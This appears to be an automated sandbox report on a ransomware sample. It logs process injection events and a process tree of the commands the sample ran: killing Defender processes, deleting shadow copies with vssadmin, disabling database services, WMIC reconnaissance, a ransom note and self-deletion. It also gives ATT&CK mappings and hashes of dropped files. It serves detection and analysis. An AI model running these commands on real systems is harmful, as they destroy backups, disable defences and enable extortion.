Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: 36	2368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1388	WMIC.exe
Token: SeSecurityPrivilege	1388	WMIC.exe
Token: SeTakeOwnershipPrivilege	1388	WMIC.exe
Token: SeLoadDriverPrivilege	1388	WMIC.exe
Token: SeSystemProfilePrivilege	1388	WMIC.exe
Token: SeSystemtimePrivilege	1388	WMIC.exe
Token: SeProfSingleProcessPrivilege	1388	WMIC.exe
Token: SeIncBasePriorityPrivilege	1388	WMIC.exe
Token: SeCreatePagefilePrivilege	1388	WMIC.exe
Token: SeBackupPrivilege	1388	WMIC.exe
Token: SeRestorePrivilege	1388	WMIC.exe
Token: SeShutdownPrivilege	1388	WMIC.exe
Token: SeDebugPrivilege	1388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1388	WMIC.exe
Token: SeRemoteShutdownPrivilege	1388	WMIC.exe
Token: SeUndockPrivilege	1388	WMIC.exe
Token: SeManageVolumePrivilege	1388	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 800 wrote to memory of 1876	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	83
PID 800 wrote to memory of 1876	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	83
PID 800 wrote to memory of 1876	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	83
PID 1876 wrote to memory of 1276	1876	cmd.exe	85
PID 1876 wrote to memory of 1276	1876	cmd.exe	85
PID 1876 wrote to memory of 1276	1876	cmd.exe	85
PID 800 wrote to memory of 3416	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	86
PID 800 wrote to memory of 3416	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	86
PID 800 wrote to memory of 3416	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	86
PID 800 wrote to memory of 2600	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	88
PID 800 wrote to memory of 2600	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	88
PID 800 wrote to memory of 2600	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	88
PID 800 wrote to memory of 3780	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	90
PID 800 wrote to memory of 3780	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	90
PID 800 wrote to memory of 3780	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	90
PID 3780 wrote to memory of 2368	3780	cmd.exe	92
PID 3780 wrote to memory of 2368	3780	cmd.exe	92
PID 3780 wrote to memory of 2368	3780	cmd.exe	92
PID 800 wrote to memory of 936	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	93
PID 800 wrote to memory of 936	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	93
PID 800 wrote to memory of 936	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	93
PID 800 wrote to memory of 3660	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	95
PID 800 wrote to memory of 3660	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	95
PID 800 wrote to memory of 3660	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	95
PID 3660 wrote to memory of 1388	3660	cmd.exe	97
PID 3660 wrote to memory of 1388	3660	cmd.exe	97
PID 3660 wrote to memory of 1388	3660	cmd.exe	97
PID 800 wrote to memory of 3724	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	98
PID 800 wrote to memory of 3724	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	98
PID 800 wrote to memory of 3724	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	98
PID 800 wrote to memory of 3604	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	100
PID 800 wrote to memory of 3604	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	100
PID 800 wrote to memory of 3604	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	100
PID 3604 wrote to memory of 3816	3604	cmd.exe	102
PID 3604 wrote to memory of 3816	3604	cmd.exe	102
PID 3604 wrote to memory of 3816	3604	cmd.exe	102
PID 800 wrote to memory of 928	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	103
PID 800 wrote to memory of 928	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	103
PID 800 wrote to memory of 928	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	103
PID 800 wrote to memory of 2080	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	105
PID 800 wrote to memory of 2080	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	105
PID 800 wrote to memory of 2080	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	105
PID 2080 wrote to memory of 4872	2080	cmd.exe	107
PID 2080 wrote to memory of 4872	2080	cmd.exe	107
PID 2080 wrote to memory of 4872	2080	cmd.exe	107
PID 800 wrote to memory of 2912	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	108
PID 800 wrote to memory of 2912	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	108
PID 800 wrote to memory of 2912	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	108
PID 800 wrote to memory of 752	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	110
PID 800 wrote to memory of 752	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	110
PID 800 wrote to memory of 752	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	110
PID 752 wrote to memory of 2552	752	cmd.exe	112
PID 752 wrote to memory of 2552	752	cmd.exe	112
PID 752 wrote to memory of 2552	752	cmd.exe	112
PID 800 wrote to memory of 1880	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	113
PID 800 wrote to memory of 1880	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	113
PID 800 wrote to memory of 1880	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	113
PID 800 wrote to memory of 4800	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	115
PID 800 wrote to memory of 4800	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	115
PID 800 wrote to memory of 4800	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	115
PID 4800 wrote to memory of 1248	4800	cmd.exe	117
PID 4800 wrote to memory of 1248	4800	cmd.exe	117
PID 4800 wrote to memory of 1248	4800	cmd.exe	117
PID 800 wrote to memory of 4636	800	d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe	119

C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe
"C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies extensions of user files
- Windows security modification
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM MSASCuiL.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
  2⤵
  PID:3416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo OS INFO: > %TEMP%\GBGILUCKL"
  2⤵
  PID:2600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic OS get Caption,CSDVersion,OSArchitecture,Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo BIOS INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo CPU INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
    3⤵
    PID:3816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMPHYSICAL get MaxCapacity
    3⤵
    PID:4872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\GBGILUCKL"
  2⤵
  PID:2912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
    3⤵
    PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo NIC INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\GBGILUCKL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic NIC get Description, MACAddress, NetEnabled, Speed
    3⤵
    PID:1248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DISKDRIVE INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\GBGILUCKL"
  2⤵
  PID:996
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic DISKDRIVE get InterfaceType, Name, Size, Status
    3⤵
    PID:3748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo USERACCOUNT INFO: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\GBGILUCKL"
  2⤵
  PID:484
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
    3⤵
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo IPCONFIG: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:4756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "ipconfig >> %TEMP%\GBGILUCKL"
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "echo DATABASES FILES: >> %TEMP%\GBGILUCKL"
  2⤵
  PID:3464
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\d2203b6d272d44b7abc66e290c3b79767428168b077a16ded1db0babbe34f333.exe"
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 3000
    3⤵
    - Runs ping.exe
    PID:4852

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4016

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
11B

MD5
887ae0db192785398c154a027c858317

SHA1
9e1258a3444e7f54d4a2b23bec0c020d67f285b6

SHA256
9841fc54844c86d073907913cfd2fccc49d13db491e790c6aeb30b7159e62bf5

SHA512
65364e8797ecc23d9eac18cfe0c1393e9429ee15cde33b7b936c917608196da7bf53ba7c21d9bb637c9a91797eb58a4dbb2346dc4bd9e6c947a711b381dfcb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
296B

MD5
e771e08346c6a2bc73c2a372cba333d8

SHA1
58a23e4ce4c758212d9cef74045c31dba35d4923

SHA256
12846bff5586d9a89874c612d9269e2ba1e5a730438373ce9a08919b58a0df6f

SHA512
0611c1d8f71ef330812f72ce0d7416253caf3a5feab48545dcd26f4b242949fd7f7fc58da069bec8bc2600c52d8df6d9b43012a429b1d96a88749951dd461c15

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
296B

MD5
e771e08346c6a2bc73c2a372cba333d8

SHA1
58a23e4ce4c758212d9cef74045c31dba35d4923

SHA256
12846bff5586d9a89874c612d9269e2ba1e5a730438373ce9a08919b58a0df6f

SHA512
0611c1d8f71ef330812f72ce0d7416253caf3a5feab48545dcd26f4b242949fd7f7fc58da069bec8bc2600c52d8df6d9b43012a429b1d96a88749951dd461c15

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
668B

MD5
fc4dd1d0772fb154de31953c2b421a26

SHA1
f8273a9f46597ef98632d8082a24210c5b0d1158

SHA256
17e67d6439097c6b6cb5105e6661d18678921cc5ae4d03f31d1ed950df738b1b

SHA512
605cd1b8d10b64e3ad0388e753c658bc0ee6a3c6262952705b9516f9df3a59b50aac01fe0d0da7193aa16d12dfcff3126a71485414818593a2d6fbed1edd162f

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
668B

MD5
fc4dd1d0772fb154de31953c2b421a26

SHA1
f8273a9f46597ef98632d8082a24210c5b0d1158

SHA256
17e67d6439097c6b6cb5105e6661d18678921cc5ae4d03f31d1ed950df738b1b

SHA512
605cd1b8d10b64e3ad0388e753c658bc0ee6a3c6262952705b9516f9df3a59b50aac01fe0d0da7193aa16d12dfcff3126a71485414818593a2d6fbed1edd162f

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
c71e901a4f65c7a50a11a3b836622873

SHA1
162f9bfcc801e7db8da1eb8ce42b21b1f50a09e9

SHA256
f33353dd1816be2913e1950ddc935aa9e70010a15abdbf7d1001a55edc82e52a

SHA512
b0de60436bea2d756e350b44be69252fd744f435a5b7e119452230eaf57a7ff339071be29eaa4b501eb01bf227bde590c36ef17683e090ddad745ceb4c4ed681

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
c71e901a4f65c7a50a11a3b836622873

SHA1
162f9bfcc801e7db8da1eb8ce42b21b1f50a09e9

SHA256
f33353dd1816be2913e1950ddc935aa9e70010a15abdbf7d1001a55edc82e52a

SHA512
b0de60436bea2d756e350b44be69252fd744f435a5b7e119452230eaf57a7ff339071be29eaa4b501eb01bf227bde590c36ef17683e090ddad745ceb4c4ed681

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
69844fa8296e4e4e2b29f921141ae838

SHA1
e161644d7ba0c4ffc86be06abf77ff390ec85676

SHA256
53031d7b21762222ab98e3f9ef68b2fa902ddcb0bc4d4c0dbbe8bfbb09e0dc96

SHA512
bda825eceb2c58081b192058199ef67c60e4177ae36ba69b0ead3e77b2e6d96d2444638989bd975947c78741a04f94a220c1a5cce4b32fb57685d27cf5b93396

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
f4b09ff7e0b9d684242f02f3bfc973d2

SHA1
06572016df2cc5f83e1e29f28ca08ccd6adbcf31

SHA256
3a72d27644968b8c776cb9f865570eb038415fabb1acba749a88f39c5ca5a86c

SHA512
e02ddc00772434e25e98387afe56a5ec45d89ad98ee9dd204ca9d67458ec9f00bf5840b09bcdee090e507360f699903e402bb4c585c205eaa57dc67418ee3229

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
65c1247c68ad9d85a3b2d66beb9cea42

SHA1
71d429cf2722b43109a8823d06633c46e52c2a54

SHA256
9f08c7a43c50b013aff9ae8d8ad86520d55ddb4ac61b63b08380101ece9b00fb

SHA512
bfb9877a702b7cd7d53bf1d2ca5ddef36052048c6b832e00298cd32d259cfda8ccd2662d7e449a55334e738009b820a71fc955f758baf055f521aab527f7b658

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
65c1247c68ad9d85a3b2d66beb9cea42

SHA1
71d429cf2722b43109a8823d06633c46e52c2a54

SHA256
9f08c7a43c50b013aff9ae8d8ad86520d55ddb4ac61b63b08380101ece9b00fb

SHA512
bfb9877a702b7cd7d53bf1d2ca5ddef36052048c6b832e00298cd32d259cfda8ccd2662d7e449a55334e738009b820a71fc955f758baf055f521aab527f7b658

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
994116f6b0501c491a7621d5048e9f4b

SHA1
b482af1cbf5e45f396afb9bb00ae7d0446d72985

SHA256
1976076a5ec60e9815da5b1f2ae12ded3f5d55ce108a403308b4d4bd4fd5b642

SHA512
90bf00a88b8a7873914143547b0065a4eea65aec4d0919a19450038e4a142cedfdc7f371bc12133f8455dbd7e25b8e783cc8806a42034369057e23c2b34b22e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
1KB

MD5
994116f6b0501c491a7621d5048e9f4b

SHA1
b482af1cbf5e45f396afb9bb00ae7d0446d72985

SHA256
1976076a5ec60e9815da5b1f2ae12ded3f5d55ce108a403308b4d4bd4fd5b642

SHA512
90bf00a88b8a7873914143547b0065a4eea65aec4d0919a19450038e4a142cedfdc7f371bc12133f8455dbd7e25b8e783cc8806a42034369057e23c2b34b22e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
2KB

MD5
ce7dbb26acb257e9fb24d80fc2311a67

SHA1
6948d5334109bc48a5476c34ccd7ccf528b23203

SHA256
80aa6c0403a492445f4272ffc8263bd58185e6648521c4c1421ab1fa5852b79d

SHA512
025709adfb06ee002d87e0d0b8d333c9ec571aef9a01d5ac0e1e1bd56c3c6ac34838f4538d70fc9580b8d99f81706a2d6f0b7d414ad1996a191efac29c54c8c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
2KB

MD5
476d314c9ed62e476f624619c149a65e

SHA1
610f7959e8947a41f79a0d8b9df0b3e86c49886b

SHA256
46b1b0709a9d8c2387ac239a195120dbc8d0d7e94065785d4e25c4cb4a89cd43

SHA512
3873122f804ba2825215cd1b610b43a03e1ec284e411cff5a61a9c73c16ff67a58764305f2895f8f4db058f77f2ba2c907b4446ef5121bedd42eaad0326f6f58

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
3KB

MD5
ec767b3c764ac91ed6475074a8e0ac94

SHA1
082309bf9fd1fa5a602d542053578b43775d49c3

SHA256
fc3d110288f112ad4c5d0cb13b26c113f58376476066d2ae70db762ff7e68969

SHA512
16ca8f760a854d8cbc052d82ead09a893cc29307dc1ad84020ffb80949ad47049a12dec2a4829137aa457d8d0393c7b2d6f28d140ded83ebaafadc6fa4ab7a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
3KB

MD5
ec767b3c764ac91ed6475074a8e0ac94

SHA1
082309bf9fd1fa5a602d542053578b43775d49c3

SHA256
fc3d110288f112ad4c5d0cb13b26c113f58376476066d2ae70db762ff7e68969

SHA512
16ca8f760a854d8cbc052d82ead09a893cc29307dc1ad84020ffb80949ad47049a12dec2a4829137aa457d8d0393c7b2d6f28d140ded83ebaafadc6fa4ab7a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GBGILUCKL

Filesize
3KB

MD5
6a2fd4a61d25fa28772cf3d084906724

SHA1
1bd33d88a3f4b35697698dc139b77ca7c7fd3ae6

SHA256
74a69674c90f2f05400fffe28aede58da013ba80f006325f52925ea25ef42c19

SHA512
6c349665ab5ad99ce73ad1e19aea207c790ba7ee95a2afce5a50ca03577d46954ffd153d9c373ae97694a40262e6b748d6767ef0e018a1af6756442cbdadbfc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_LNELD.txt

Filesize
11KB

MD5
ec25a0ebcaeea5e3ea5d70290ac119b3

SHA1
32bc2578b420b2fb161483721f44aa63675f3508

SHA256
148926f474d924e64cde5e4113bb157a9392ed96cd2d872353deb84c0b0159e3

SHA512
717a862cd7f49e8e6b5584fb7f771141f4fb601c66732e21121c59e3490d8a8e1568871295828e90c4ae635fb771f31de4e2aa7b85dfda64bc4be11fbe17ca3a

Download Submit
memory/800-182-0x0000000000DF0000-0x0000000001E65000-memory.dmp

Filesize
16.5MB

Download
memory/800-185-0x0000000000DF0000-0x0000000001E65000-memory.dmp

Filesize
16.5MB

Download
memory/800-133-0x0000000000DF0000-0x0000000001E65000-memory.dmp

Filesize
16.5MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads